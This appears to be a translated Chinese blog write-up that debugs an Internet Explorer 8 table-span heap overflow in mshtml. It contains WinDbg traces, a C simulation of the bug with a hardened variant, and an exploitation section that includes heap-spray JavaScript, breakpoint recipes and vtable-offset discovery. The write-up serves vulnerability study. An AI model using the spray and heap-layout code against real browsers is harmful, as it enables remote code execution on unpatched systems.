07e20fa0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fb0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fc0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fd0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fe0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20ff0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e21000 ???????? ???????? ???????? ????????

1:025> !heap -p -a 07e20f90
address 07e20f90 found in
_DPH_HEAP_ROOT @ 171000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
7e71f70: 7e20f90 70 - 7e20000 2000

Also, let's look at spansum and spancmp, the two values that are compared.

1:025> dd ebx+54
0492aefc 00000001 00000000 ffffffff 00000000
0492af0c ffffffff 691c9fd0 00000004 00000004
0492af1c 0497eff0 691c9fd0 00000004 00000004
0492af2c 04936ff0 00000000 00000000 691c9fd0
0492af3c 00000000 00000004 07f27f90 00000000
0492af4c 00000000 00000000 00000000 00000000
0492af5c 00000000 00000000 00000000 000000c8
0492af6c 000000c8 00000000 00000000 00000000
1:025> dd ebx+94
0492af3c 00000000 00000004 07f27f90 00000000
0492af4c 00000000 00000000 00000000 00000000
0492af5c 00000000 00000000 00000000 000000c8
0492af6c 000000c8 00000000 00000000 00000000
0492af7c 00000000 00000000 00000000 00000000
0492af8c 00000000 00000000 00000000 00000000
0492af9c 00000000 00000000 00000000 00000000
0492afac 00000000 ffffffff 00000001 00000000

From the listing above, a block of 0x70 bytes is allocated and its address is stored at CTableLayout+0x9C.
Summary:

  • The first argument of CTableLayout::CalculateMinMax is the CTableLayout object, i.e. the table tag's object in memory.
  • CTableLayout+0x54: the sum of the span attribute values, spansum
  • CTableLayout+0x9C: holds vulheap, an allocation of at least 0x70 bytes
  • CTableLayout+0x94: spancmp, compared against spansum; the vulnerable heap block is only allocated when spancmp>>2 is less than spansum.

Things to note
After another g, the dialog asking to allow ActiveX appears,

and then you find

I don't know whether this function was triggered again somewhere in between or the PoC was re-run; in any case, at this point spansum and spancmp have not changed, still 1 and 0 respectively.
I think it was probably triggered again somewhere in between; it does not look like a re-run, but I'm not sure why, since I have not read this module in full.
In any case, after one more g it matches 泉哥's book: spansum is still 1 and spancmp becomes 4.

After the memory has been allocated, when the over_trigger function in the PoC executes, execution breaks in CTableLayout::CalculateMinMax again. Step in and look at the values of spansum and spancmp.

1:025> bl
0 e 692d018a 0001 (0001) 1:**** mshtml!CTableLayout::CalculateMinMax
1 e 692d02f2 0001 (0001) 1:**** mshtml!CTableLayout::CalculateMinMax+0x1d3
1:025> bc 1
1:025> bl
0 e 692d018a 0001 (0001) 1:**** mshtml!CTableLayout::CalculateMinMax

Remove the extra breakpoint set earlier; note that bc takes the breakpoint number.

1:025> g
(c84.e94): Unknown exception - code 80010108 (first chance)
(c84.e94): Unknown exception - code 80010108 (first chance)
(c84.8e8): Unknown exception - code 80010108 (first chance)
(c84.758): Unknown exception - code 80010108 (first chance)
Breakpoint 0 hit
eax=ffffffff ebx=063bbea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff mov edi,edi
1:025> dd ebx+54
082e6efc 00000001 ffffffff ffffffff ffffffff
082e6f0c ffffffff 691c9fd0 00000004 00000004
082e6f1c 0816bff0 691c9fd0 00000004 00000004
082e6f2c 082a2ff0 00000000 00000000 691c9fd0
082e6f3c 00000004 00000004 070f4f90 00000000
082e6f4c 00000000 00000000 00000000 00000000
082e6f5c 00000000 00000000 00000000 000000c8
082e6f6c 000000c8 00000000 00000000 00000000
1:025> dd ebx+94
082e6f3c 00000004 00000004 070f4f90 00000000
082e6f4c 00000000 00000000 00000000 00000000
082e6f5c 00000000 00000000 00000000 000000c8
082e6f6c 000000c8 00000000 00000000 00000000
082e6f7c 00000000 00000000 00000000 00000001
082e6f8c 00000000 00000000 00000000 00000000
082e6f9c 00000000 00000000 00000000 00000000
082e6fac 00000000 ffffffff 00000001 00000000

spansum is 1 and spancmp is 4; (4>>2) is 1 == 1, so the jump is not taken and no memory is allocated.

But in over_trigger we have already set span to 1000, which is also the maximum allowed value.
Execution then reaches mshtml!CTableLayout::CalculateMinMax+0x37e. I had originally set a bp there and typed g, but it did not break (most likely I placed the breakpoint in the wrong spot and execution never entered that block), so there was no choice but to single-step with p. Along the way I learned a new trick: p 10 steps 10 times at once.

1:025> p
eax=08864fd0 ebx=082e6ea8 ecx=00000032 edx=00000000 esi=04f47fac edi=08864fd0
eip=69465a2e esp=0467e410 ebp=0467e4ac iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x37e:
69465a2e e8d445dfff call mshtml!CTableCol::GetAAspan (6925a007) ---> fetches the span column count; returns 1 here
1:025> p
eax=00000001 --> return value ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a33 esp=0467e410 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x383:
69465a33 3de8030000 cmp eax,3E8h ---> span is at most 1000
1:025> p
eax=00000001 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a38 esp=0467e410 ebp=0467e4ac iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
mshtml!CTableLayout::CalculateMinMax+0x388:
69465a38 894510 mov dword ptr [ebp+10h],eax ss:0023:0467e4bc=00000000
1:025> p
eax=00000001 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a3b esp=0467e410 ebp=0467e4ac iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
mshtml!CTableLayout::CalculateMinMax+0x38b:
69465a3b 7c07 jl mshtml!CTableLayout::CalculateMinMax+0x394 (69465a44) [br=1]

Set a breakpoint on mshtml!CTableCol::GetAAspan so that it breaks the second time the span value is fetched.

1:025> bp mshtml!CTableCol::GetAAspan
1:025> g
Breakpoint 0 hit
eax=ffffffff ebx=082e6ea8 ecx=00402c02 edx=ffffffff esi=00000000 edi=0467df24
eip=692d018a esp=0467dcc8 ebp=0467dee0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff mov edi,edi
1:025> g
Breakpoint 1 hit
eax=08864fd0 ebx=082e6ea8 ecx=00000032 edx=00000000 esi=04f47fac edi=08864fd0
eip=6925a007 esp=0467dc24 ebp=0467dcc4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableCol::GetAAspan:
6925a007 8bff mov edi,edi
1:025> gu
eax=000003e8 ---> return value; span is now 0x3e8, i.e. the maximum 1000 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a33 esp=0467dc28 ebp=0467dcc4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x383:
69465a33 3de8030000 cmp eax,3E8h

gu runs until the current function returns.
At this point the span value is already 0x3e8, i.e. the maximum of 1000.
Let's continue analysing the code that follows.

.text:74EC5AB3 call ?GetPixelWidth@CWidthUnitValue@@QBEHPBVCDocInfo@@PAVCElement@@H@Z ; CWidthUnitValue::GetPixelWidth(CDocInfo const *,CElement *,int)
.text:74EC5AB8 cmp [ebp+var_5C], 0
.text:74EC5ABC mov [ebp+var_2C], eax ;---> width is computed, giving copydata=width*100
....
...
...
.text:74EC5B3E mov eax, [ebp+arg_8] ;-----> span=1000
.text:74EC5B41 imul ecx, 1Ch ;----> 1000*0x1C
.text:74EC5B44 add [ebp+var_38], eax
.text:74EC5B47 mov [ebp+var_20], ecx
.text:74EC5B4A jmp short loc_74EC5B4F ;----> vulheap address
.text:74EC5B4C ; ---------------------------------------------------------------------------
.text:74EC5B4C
.text:74EC5B4C loc_74EC5B4C: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+195A11j
.text:74EC5B4C mov ecx, [ebp+var_20]
.text:74EC5B4F
.text:74EC5B4F loc_74EC5B4F: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959C0j
.text:74EC5B4F mov eax, [ebx+9Ch];---->vulheap地址
.text:74EC5B55 add eax, ecx;----->offset=vulheap+1000*0x1c>0x70(vulheap大小),最终会导致堆溢出!
.text:74EC5B57 cmp [ebp+var_1C], 0
.text:74EC5B5B mov [ebp+var_24], eax;---->作为后面AdjustForCol函数的参数
.text:74EC5B5E jz short loc_74EC5B7A
.text:74EC5B60 mov eax, [ebp+arg_8]
.text:74EC5B63 cmp eax, 1
.text:74EC5B66 jle short loc_74EC5B7A
.text:74EC5B68 dec eax
.text:74EC5B69 cmp [ebp+var_14], eax
.text:74EC5B6C jnz short loc_74EC5B7A
.text:74EC5B6E imul eax, [ebp+var_C]
.text:74EC5B72 mov ecx, [ebp+var_2C]
.text:74EC5B75 sub ecx, eax ; this
.text:74EC5B77 mov [ebp+var_C], ecx
.text:74EC5B7A push [ebp+var_3C] ; struct CCalcInfo *
.text:74EC5B7D mov eax, [ebp+var_34]
.text:74EC5B80 push [ebp+arg_4] ; int
.text:74EC5B83 mov esi, [ebp+var_24]
.text:74EC5B86 push [ebp+var_C] ; ---->前面经width计算得到的Copydata,即用于复制到vulheap的数据内容。
.text:74EC5B89 call ?AdjustForCol@CTableColCalc@@QAEXPBVCWidthUnitValue@@HPAVCCalcInfo@@H@Z ; CTableColCalc::AdjustForCol(CWidthUnitValue const *,int,CCalcInfo *,int)

The value copied is width * 100: here width is 41 (decimal), so the value written is 41 * 100 = 4100 = 0x1004, the pattern that fills the dumps further down.
AdjustForCol then writes this into vulheap once per spanned column, i.e. for 1000 entries of 0x1c bytes each, which overflows the heap.
One more g and it crashes.


Summary

  1. When the page loads, CTableLayout::CalculateMinMax is called for the first time. The col's span attribute is initialised to 1, so spansum = 1 and spancmp = 0.
  2. Because (spancmp >> 2) < spansum, i.e. 0 < 1, EnsureSizeWorker is called to allocate 0x1c * spansum bytes, but it allocates at least 0x1C * 4 = 0x70 bytes.
  3. After the allocation spancmp = spansum * 4 = 4, so (spancmp >> 2) == spansum, i.e. 4/4 == 1, and no further allocation takes place.
  4. over_trigger() runs and CTableLayout::CalculateMinMax is called a second time. spansum and spancmp are unchanged, but span is now 1000. When the width * 100 value is copied into the allocated buffer, span is the loop counter for the writes into vulheap, and 1000 * 0x1C > 0x70, so the heap overflows.

From the debugging, the shr eax,2 on page 142 of 泉哥's book is misread there: shr is a right shift, but the book writes it as the left-shift operator <<.
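The four steps above as a small C model. This is an added example, not Internet Explorer's code and not taken from the page or from 漏洞战争: the spansum/spancmp bookkeeping, the 0x70-byte minimum and the 0x1c-byte stride are as the summary describes them; the struct, the function names and the "hardened" variant (which sizes the array by the span that is about to be written, a straightforward fix for the model rather than a claim about the vendor's patch) are my assumptions, and a record is modelled only by the three width*100 dwords the dumps show. The vulnerable path reports how far past the 0x70-byte block the 1000-entry write would reach instead of actually corrupting memory.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define COLCALC_SIZE 0x1c               /* CTableColCalc stride (imul ecx, 1Ch in the listing) */
#define MIN_ALLOC    (4 * COLCALC_SIZE) /* 0x70: smallest block EnsureSizeWorker hands out */
#define MAX_SPAN     1000               /* CTableCol::GetAAspan clamps span to 0x3e8 */

typedef struct {
    uint8_t *buf;     /* "vulheap": the CTableColCalc array reached through [ebx+9Ch] */
    size_t   cap;     /* bytes actually allocated */
    int      spansum; /* entries the layout believes the table has */
    int      spancmp; /* capacity bookkeeping: (spancmp >> 2) entries fit */
} table_layout_t;

/* EnsureSizeWorker as the summary describes it: grow only when the cached
   capacity (spancmp >> 2) is below the requested entry count. */
static int ensure_size(table_layout_t *t, int entries)
{
    if ((t->spancmp >> 2) >= entries)
        return 1;
    size_t want = (size_t)entries * COLCALC_SIZE;
    if (want < MIN_ALLOC)
        want = MIN_ALLOC;
    uint8_t *nb = realloc(t->buf, want);
    if (!nb)
        return 0;
    memset(nb + t->cap, 0, want - t->cap);
    t->buf = nb;
    t->cap = want;
    t->spancmp = entries * 4;
    return 1;
}

/* One CTableColCalc write. The dumps show width*100 at +0, +4 and +8 of each
   0x1c-byte record; the remaining fields are not modelled (assumption). */
static void adjust_for_col(uint8_t *rec, int width)
{
    uint32_t px = (uint32_t)width * 100;  /* CWidthUnitValue::GetPixelWidth */
    memcpy(rec + 0, &px, 4);
    memcpy(rec + 4, &px, 4);
    memcpy(rec + 8, &px, 4);
}

/* Second-pass CalculateMinMax. Returns how many bytes the loop would have
   written past the end of the allocation; the model stops at the boundary. */
static size_t calculate_min_max(table_layout_t *t, int span, int width, int hardened)
{
    if (span > MAX_SPAN)
        span = MAX_SPAN;
    /* vulnerable: size by the stale spansum; hardened: by the span being written */
    if (!ensure_size(t, hardened ? span : t->spansum))
        return 0;
    for (int i = 0; i < span; i++) {
        size_t off = (size_t)i * COLCALC_SIZE;     /* add eax, ecx in the listing */
        if (off + COLCALC_SIZE > t->cap)
            return (size_t)span * COLCALC_SIZE - t->cap;
        adjust_for_col(t->buf + off, width);
    }
    return 0;
}

/* Replay of the PoC: <col span=1 width=41> at page load, then over_trigger()
   sets span=1000. Returns the overflow in bytes (0x6cf0 unhardened, 0 hardened). */
size_t poc_overflow_bytes(int hardened)
{
    table_layout_t t = { 0 };
    t.spansum = 1;                               /* one <col> in the table */
    calculate_min_max(&t, 1, 41, hardened);      /* first pass: 0x70-byte block */
    size_t over = calculate_min_max(&t, 1000, 41, hardened);
    free(t.buf);
    return over;
}

/* The per-record value for width=41: 4100 == 0x1004, the pattern in the dumps. */
uint32_t poc_written_value(void)
{
    table_layout_t t = { 0 };
    t.spansum = 1;
    calculate_min_max(&t, 1, 41, 0);
    uint32_t v;
    memcpy(&v, t.buf, 4);
    free(t.buf);
    return v;
}

int main(void)
{
    printf("value per record:    0x%x\n", poc_written_value());
    printf("unhardened overflow: 0x%zx bytes\n", poc_overflow_bytes(0));
    printf("hardened overflow:   0x%zx bytes\n", poc_overflow_bytes(1));
    return 0;
}
```

The unhardened replay reports 0x6cf0 bytes: 1000 * 0x1c = 0x6d60 bytes requested against the 0x70 that step 2 allocated. Because the check in ensure_size only ever compares against spansum, nothing in the vulnerable path looks at the span that drives the write loop, which is the whole bug.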

Exploitation

For writing the exploit see 漏洞战争; here I only debug a few of the key ideas.

One setup point before attaching: the heap arrangement below depends on ordinary heap chunk spacing. Page heap enabled earlier with gflags persists for the image until it is turned off (gflags /p /disable iexplore.exe), and a process started under the debugger, including the children picked up through .childdbg, gets the NT debug heap unless _NO_DEBUG_HEAP=1 is set in its environment; either one changes chunk metadata and spacing.

<div id="test"></div>
<script language='javascript'>

var leak_index = -1;

// Three source strings of at least 480 characters; substring() below carves
// 125-character pieces out of them, so every BSTR allocation (4-byte length,
// 125 wide characters, 2-byte terminator) is exactly 0x100 bytes.
var dap = "EEEE";
while ( dap.length < 480 ) dap += dap;

var padding = "AAAA";
while ( padding.length < 480 ) padding += padding;

var filler = "BBBB";
while ( filler.length < 480 ) filler += filler;

//spray: repeat E, A, B strings and a <button> so that each group of three
// 0x100-byte string chunks is followed by a CButtonLayout object
var arr = new Array();
var rra = new Array();

var div_container = document.getElementById("test");
div_container.style.cssText = "display:none";

for (var i=0; i < 500; i+=2) {

// E: the slot that is freed later and reused by vulheap
rra[i] = dap.substring(0, (0x100-6)/2);

// S, bstr = A: the string whose length field the overflow corrupts
arr[i] = padding.substring(0, (0x100-6)/2);

// A, bstr = B: filler between the corrupted string and the object
arr[i+1] = filler.substring(0, (0x100-6)/2);

// B: the CButtonLayout whose vtable pointer is read through the corrupted string
var obj = document.createElement("button");
div_container.appendChild(obj);

}

// free the E strings from the middle of the spray onwards so that vulheap
// lands in one of the holes
for (var i=200; i<500; i+=2 ) {
rra[i] = null;
CollectGarbage();
}

</script>

This part builds the heap layout; the resulting arrangement is shown below.

Starting from the middle (index 200), the EEEE... strings are freed to open holes.
The holes are there so that vulheap, when allocated, lands in one of them; the overflow then reaches the strings and the CButtonLayout that follow it.

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*

Microsoft (R) Windows Debugger Version 6.3.9600.17200 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*
Symbol search path is: srv*
Executable search path is: srv*
ModLoad: 013c0000 01466000 C:\Program Files\Internet Explorer\iexplore.exe
(c0.ea8): Break instruction exception - code 80000003 (first chance)
eax=7ff96000 ebx=00000000 ecx=00000000 edx=77a0d23d esi=00000000 edi=00000000
eip=779a3540 esp=07abfe00 ebp=07abfe2c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
779a3540 cc int 3
0:021> .childdbg 1
Processes created by the current process will be debugged
0:021> .symfix
0:021> .reload
Reloading current modules
................................................................
...........
0:021> sxe ld:jscript
0:021> g

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*
Symbol search path is: srv*
Executable search path is: srv*
(fd4.630): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=0014f620 edx=779b64f4 esi=fffffffe edi=00000000
eip=77a0e60e esp=0014f63c ebp=0014f668 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2c:
77a0e60e cc int 3
1:014> lmm jscript
start end module name
1:014> g
ModLoad: 6f640000 6f6f2000 C:\Windows\System32\jscript.dll
eax=0345de14 ebx=00000000 ecx=00000007 edx=00000000 esi=7ffda000 edi=0345e22c
eip=779b64f4 esp=0345e144 ebp=0345e198 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!KiFastSystemCallRet:
779b64f4 c3 ret
1:023> lmm jscript
start end module name
6f640000 6f6f2000 jscript (deferred)

First attach windbg to IE and enable childdbg. jscript.dll is not loaded yet at this point, so set a module-load exception (sxe ld:jscript) to break when jscript.dll loads, press g, and drag the exp into the browser.
Once lmm confirms it is loaded, set a breakpoint (bp) on jscript!JsCollectGarbage and g again.

1:023> bp jscript!JsCollectGarbage
1:023> g
Breakpoint 0 hit
eax=0345f0f0 ebx=0345f0a0 ecx=0136e0a0 edx=6f6c8555 esi=0136ff40 edi=0345f090
eip=6f6c8555 esp=0345f050 ebp=0345f0b4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
jscript!JsCollectGarbage:
6f6c8555 a180d06d6f mov eax,dword ptr [jscript!g_luTls (6f6dd080)] ds:0023:6f6dd080=00000038

Keep setting breakpoints to find where vulheap is allocated; for the detailed analysis see 漏洞战争.

1:023> bl
0 e 6f6c8555 0001 (0001) 1:**** jscript!JsCollectGarbage
1:023> bd 0
1:023> bu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"
1:023> bu mshtml!CTableLayout::CalculateMinMax+0x16d ".echo vulheap;dd poi(ebx+9c) l4;g"
1:023> bu jscript!JsStrSubString
1:023> .logopen
Opened log file 'dbgeng.log'

Open a log file to record the session; I also set an extra breakpoint on jscript!JsStrSubString.
I also changed the exp slightly by adding an alert.

<script language='javascript'>
alert(1);
var obj_col = document.getElementById("132");
obj_col.span = 19;

It breaks:

.....
.....
.....
.....
free heap
0156d718 ff ff ff ff ff ff ff ff-80 32 0c 04 00 00 00 00 .........2......
free heap
040c3280 80 59 ed 69 00 00 00 00-00 00 00 00 c7 59 e9 00 .Y.i.........Y..
Breakpoint 5 hit
eax=0375f108 ebx=0375efa0 ecx=02f01318 edx=6eb289cb esi=02f05800 edi=0375f2b4
eip=6eb289cb esp=0375ef50 ebp=0375efb4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
jscript!JsStrSubstring:
6eb289cb 8bff mov edi,edi
1:025> .logclose
Closing open log file dbgeng.log

After saving the log, the last vulheap entry in it is the one we want.

To determine the vtable offset, just look it up dynamically.

1:027> x mshtml!CButtonLayout::*
6a04519d mshtml!CButtonLayout::GetThemeClassId (<no parameter info>)
6a0c0d9d mshtml!CButtonLayout::GetInsets (<no parameter info>)
69ff3c90 mshtml!CButtonLayout::`vftable' = <no type information>
6a045499 mshtml!CButtonLayout::GetAutoSize (<no parameter info>)
6a2562f6 mshtml!CButtonLayout::HitTestContent (<no parameter info>)
6a02b4b7 mshtml!CButtonLayout::DrawClientBackground (<no parameter info>)
69ff9251 mshtml!CButtonLayout::Init (<no parameter info>)
6a045499 mshtml!CButtonLayout::GetMultiLine (<no parameter info>)
6a1c61d8 mshtml!CButtonLayout::s_layoutdesc = <no type information>
6a2562e6 mshtml!CButtonLayout::GetBtnHelper (<no parameter info>)
6a256121 mshtml!CButtonLayout::GetFocusShape (<no parameter info>)
6a1c61d1 mshtml!CButtonLayout::GetLayoutDesc (<no parameter info>)
6a256281 mshtml!CButtonLayout::DoLayout (<no parameter info>)
6a04519d mshtml!CButtonLayout::GetWordWrap (<no parameter info>)
69ff3af8 mshtml!CButtonLayout::`vftable' = <no type information>
6a02b4f2 mshtml!CButtonLayout::DrawClient (<no parameter info>)
6a0a32da mshtml!CButtonLayout::`scalar deleting destructor' (<no parameter info>)
6a255f61 mshtml!CButtonLayout::DrawClientBorder (<no parameter info>)
6a0a32da mshtml!CButtonLayout::`vector deleting destructor' (<no parameter info>)
6a0c2394 mshtml!CButtonLayout::GetDefaultSize (<no parameter info>)

Oddly, there are two vtables; I don't know why.

1:027> lmm mshtml
start end module name
69e80000 6a432000 mshtml (pdb symbols) C:\WinDbg\x86\sym\mshtml.pdb\5B825981E9B445BBB998A27119FF0D6E2\mshtml.pdb

69ff3af8 - 69e80000 = 0x00173af8
This matches the offset 泉哥's book gives for the Chinese Win7 + IE8 environment.


This is where I got confused.
Let's also look at vulheap.

1:026> db 03f2ae30 l101c
03f2ae30 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2ae40 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2ae50 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2ae60 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2ae70 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2ae80 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2ae90 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2aea0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2aeb0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2aec0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2aed0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2aee0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2aef0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2af00 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2af10 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2af20 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2af30 04 10 00 00 04 10 00 00-0c 61 81 04 00 00 00 00 .........a......
03f2af40 02 00 00 00 48 00 01 00-04 10 00 00 04 10 00 00 ....H...........
03f2af50 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2af60 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2af70 41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00 A.A.A.A.A.A.H...
03f2af80 04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00 ............A.A.
03f2af90 41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00 A.A.A.A.H.......
03f2afa0 04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00 ........A.A.A.A.
03f2afb0 41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00 A.A.H...........
03f2afc0 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2afd0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2afe0 41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00 A.A.A.A.A.A.H...
03f2aff0 04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00 ............A.A.
03f2b000 41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00 A.A.A.A.H.......
03f2b010 04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00 ........A.A.A.A.
03f2b020 41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00 A.A.H...........
03f2b030 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2b040 48 00 01 00 41 00 00 00-20 10 d1 01 00 00 00 c2 H...A... .......
03f2b050 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b060 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b070 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b080 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b090 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0c0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b100 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b110 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b120 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b130 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b140 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b150 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2b160 05 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 .........j......
03f2b170 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2b180 70 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 p....<.h........
03f2b190 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2b1a0 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2b1b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1c0 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2b1d0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1e0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b200 00 00 00 00 00 00 00 00-00 00 00 00 28 b2 f2 03 ............(...
03f2b210 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b220 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b230 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b240 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2b250 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b260 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
